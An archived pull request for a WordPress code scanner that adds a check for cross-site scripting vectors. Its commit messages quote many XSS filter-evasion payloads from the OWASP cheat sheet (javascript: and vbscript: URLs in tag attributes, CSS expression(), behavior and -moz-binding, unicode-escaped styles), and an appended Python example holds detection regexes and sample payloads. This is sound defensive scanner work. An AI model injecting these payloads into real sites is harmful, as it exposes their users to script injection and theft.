This repository has been archived by the owner on Jul 20, 2018. It is now read-only.
… efficient scanning. I made this change so that when searching for XSS vulnerabilities, I wouldn't have to run through two foreach ( $this->filter_files() ) blocks, one for php and one for html. It should make scanning multiple types at once much easier.
Includes checks for:
javascript in <link> tag href attributes
javascript in all HTML tags' style attributes
-moz-binding CSS attribute
…ll now scan in the plugin as well.
…tead of adding more sanitization code to each check.
…g() helper function.
Example: <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> (From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
Examples: <STYLE>body{ width: expression(alert('XSS')); }</STYLE> <DIV STYLE="width: expression(alert('XSS'));"> (From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
…hile scanning, like in VIPRestrictedPatternsCheck. This may work right now for the current XSS checks, but that is no guarantee that we will not have to write more specific checks for unique XSS cases.
No use in removing comment blocks if you remove the quotes first. That just won't work.
Examples: <STYLE>body{ behavior: url(xss.htc); }</STYLE> <DIV STYLE="behavior: url(xss.htc);"> (From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
This will help for any CSS like this: behavior : url(xss.htc);
…rmed html. Example: < LINK REL = "styleheet" HREF = ' javascript:alert ( "XSS" ); ' >
…ute. Examples: <BGSOUND SRC="javascript:alert('XSS');"> (From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
This also searches independent of quote style, if any.
Examples: <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> (From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
We now remove encoded tabs, newlines, carriage returns, and null characters.
…ed characters. Checks against malformed whitespace, encoded tabs, newlines, carriage returns, and null characters.
…round attribute. Examples: <BODY BACKGROUND="javascript:alert('XSS')"> (From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
…in the scan description, causing quite a ruckus.
…<img> tag attributes. Examples: <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> (From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
…y-tag-src to account for other scripting languages.
… HTML tag src attributes. Currently includes vbscript and livescript. Examples: <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="livescript:[code]"> (From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
Examples: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> (From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
…butes to find unicode obfuscated declarations. Example: <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> (From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
Examples: <BASE HREF="javascript:alert('XSS');//"> (From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
It currently did not include the <MATCHTEXT> group name.
…tead of strpos() to ignore case.
Examples: <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> (From https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
…ere they may not need it.
… attributes. Example: <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
The scans cover:
Javascript: body { background-image:url("javascript:alert('XSS')"); }
Behavior: body { behavior: url(xss.htc); }
Moz Binding: body { -moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss") }
Expressions: body { width: expression(alert('XSS')); }
CSS and HTML have been added, as those are the new file types being checked in XSSVectorsCheck.
This was causing problems where grep_content() was not finding the correct line to return to show in the scanner.
…k for more specific cases. After setting the regex to an ungreedy match, it was not properly finding results. I created a different regex to match the case of javascript broken by html comments. Example: <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
…k for more specific cases. After setting the regex to an ungreedy match, it was not properly finding results. I created a different regex to match the case of javascript in src tags being surrounded by whitespace and obfuscated by whitespace. Examples: <IMG SRC=" javascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');">
In hindsight, we won't be needing to check any HTML files in the unit tests, so this is not necessary.
…w_result_row() to check() in XSSVectorsCheck. After working further, I feel that there may actually be cases where HTML is valid in the scan descriptions. If escaping is necessary, it is probably better to be done on a per-case basis before the description goes to display_theme_review_result_row(). Example: If one wants to link to more information about a security concern or best practice, it may be good to have an HTML link in the description.
…iptive of its contents. The variable $file_types had a name that could cause confusion. Instead of storing file types, it stores files of multiple types (if $type is an array). I renamed it to $files_of_multiple_types to be more in line with what the variable contains.
This should be the beginnings of a solution to GitHub issue #255.
I used this "XSS Filter Evasion Cheat Sheet" as a guide when creating the scans and unit tests.
I've created a new testing class, XSSVectorsCheck. This should be able to scan for a number of common XSS attack vectors. There's a good start to unit testing in test-XSSVectorsCheck.php but due to the immense number of ways these XSS vectors can be obfuscated, there's always room to add more tests. CheckTestBase.php has been modified so that runCheck() will now search CSS files, since we now have tests for them. class-base-check.php has been modified to allow filter_files() to filter multiple file types at once (GitHub Issue #265 and pull request #266). Finally, config-vip-scanner.php has been modified to add in the new XSSVectorsCheck class.
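Added example (Python, written here rather than taken from the VIP Scanner project's PHP): a toy version of what the commits above describe, first normalising a file (decoding the encoded tab/newline/CR/NUL characters, CSS backslash and \0075-style escapes, and the HTML comments that split "javas<!-- -->cript"), then running case-insensitive patterns for the script-scheme, expression(), behavior, and -moz-binding vectors quoted from the OWASP cheat sheet. The function names (spaced, normalize, scan), the vector labels in VECTORS, and the SAMPLES inputs are my assumptions; the project's actual regexes are not on this page.

```python
"""Toy XSS-vector scanner modelled on the XSSVectorsCheck commits above
(added example, not the VIP Scanner project's own code)."""
import html
import re
def spaced(word: str) -> str:
    """Regex for `word` allowing whitespace between letters ("jav ascript")."""
    return r"\s*".join(map(re.escape, word))

# Script URL schemes named in the commits: javascript, vbscript, livescript.
SCHEME = r"(?:%s)\s*:" % "|".join(spaced(w) for w in ("javascript", "vbscript", "livescript"))

# Vector name (assumed label) -> regex run against the normalised source.
VECTORS = {
    "script-scheme-in-attribute": r"=\s*[\"']?[^\"'>]*?" + SCHEME,  # src/href/background/content
    "script-scheme-in-css-url": r"(?:url\s*\(|@import)\s*[\"']?\s*" + SCHEME,
    "css-expression": r"expression\s*\(",
    "css-behavior": r"behavior\s*:\s*url\s*\(",
    "moz-binding": r"-moz-binding\s*:",
}

def normalize(src: str) -> str:
    """Undo the obfuscations the commits describe before pattern matching."""
    src = re.sub(r"&#x?0+;", "", src, flags=re.I)             # encoded NUL
    src = html.unescape(src)                                   # &#9; &#x0A; &#13; ...
    src = re.sub(r"[\t\n\r\x00]", "", src)                     # raw tab/LF/CR/NUL
    src = re.sub(r"\\([0-9a-f]{1,6})\s?",                      # CSS hex escapes: \0075 -> u
                 lambda m: chr(int(m.group(1), 16)), src, flags=re.I)
    src = re.sub(r"\\(.)", r"\1", src)                         # CSS letter escapes: \ja\va -> java
    src = re.sub(r"<!--.*?-->", "", src, flags=re.S)           # javas<!-- -->cript
    return src.lower()

def scan(src: str) -> list[str]:
    """Return the names of every XSS vector found in one file's content."""
    text = normalize(src)
    return [name for name, pat in VECTORS.items() if re.search(pat, text)]

# Constructed samples in the style of the OWASP cheat-sheet vectors quoted above.
SAMPLES = {
    "img_tab": "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
    "img_comment": "<IMG SRC=\"javas<!-- -->cript:alert('XSS')\">",
    "css_escapes": "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>",
    "css_hex": "<DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028\\006a\\0061\\0076"
               "\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0029\">",
    "css_mix": "<DIV STYLE=\"width: expression(alert('XSS')); behavior: url(xss.htc);\">",
    "clean": "<a href=\"https://example.com/javascript-guide\">JS</a><style>body{background:url(bg.png)}</style>",
}
if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print(f"{label:12s} {scan(src)}")
```

Stripping newlines before matching is fine for a yes/no verdict but loses the line number the real scanner needs for grep_content(); a production check would match per line after decoding only the entity-encoded whitespace.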